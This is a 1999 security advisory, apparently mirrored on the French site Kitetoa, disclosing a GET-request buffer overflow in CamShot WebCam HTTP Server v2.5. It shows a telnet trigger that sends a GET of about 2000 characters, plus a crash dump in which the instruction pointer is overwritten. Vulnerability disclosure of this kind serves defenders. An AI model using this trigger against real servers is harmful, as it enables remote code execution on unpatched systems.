[Kitetoa, les pizzaïolos du Ouèb

w00giving 99 -17-

  navbarrfest
Sommaire de ce dossier
Ze advisories
Ze linkz
 

Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
Server v2.5 for Win9x/NT

USSR Advisory Code:   USSR-99028

Release Date:
December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing
time
stamped images captured from a video camera. The images can be viewed from
anywhere
on the network with a web browser. CamShot works with ‘Video For Windows
compatible
video equipment. Finally a cheap and simple way to do remote surveillance is
here!.

THE PROBLEM

UssrLabs found a Local / Remote Buffer overflow, The code that handles GET
commands
has an unchecked buffer that will allow arbitrary code to be executed if it
is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

Where [buffer] is aprox. 2000 characters. At his point the server overflows.

And in remote machine someone will be see something like this.

CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this Exploit (wen we finish it):

http://www.ussrback.com/

Vendor Status:
Informed.

Vendor   Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm

Credit: USSRLABS

SOLUTION
Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com

 

Liens de navigation

Naviguer, lire....

Page d'accueil

Nouveautés

Le Sommaire
de
Kitetoa

(orientation...)

Communiquer...

Le Forum
Kitetoa-blah-blah

Nous écrire

Les mailing-lists

Les stats du serveur

Qui sommes-nous?

Les rubriques!

Les livres publiés par Kitetoa

Les interviews

Kit'Investisseurs

Fonds d'écran et autres trucs

Les rubriques!
(suite)

KitEcout'

KessTaVu?-KiteToile

Voyages

la malle de Kitetoa
(vieilleries du site)

Les dossiers

Le monde fou des Admins

Tati versus Kitetoa

Tegam versus Guillermito

Malade mental...

Qui est Jean-Paul Ney,
condamné pour
menaces de mort
réitérées contre Kitetoa?

Le texte de la condamnation
de Jean-Paul Ney
(résumé html)
(complet pdf)

Malade mental, bis repetita

Jean-Paul Ney condamné
pour diffamation
à l'encontre du webmaster
de Kitetoa.com

Condamnation de Jean-Paul Ney
pour diffamation (pdf)

D'autres choses...

Aporismes.com

Statisticator

L'association Kite-Aide

Rechercher...

Rechercher
sur le site

et sur le Net...

Jean-Paul Ney

Jean-Paul Ney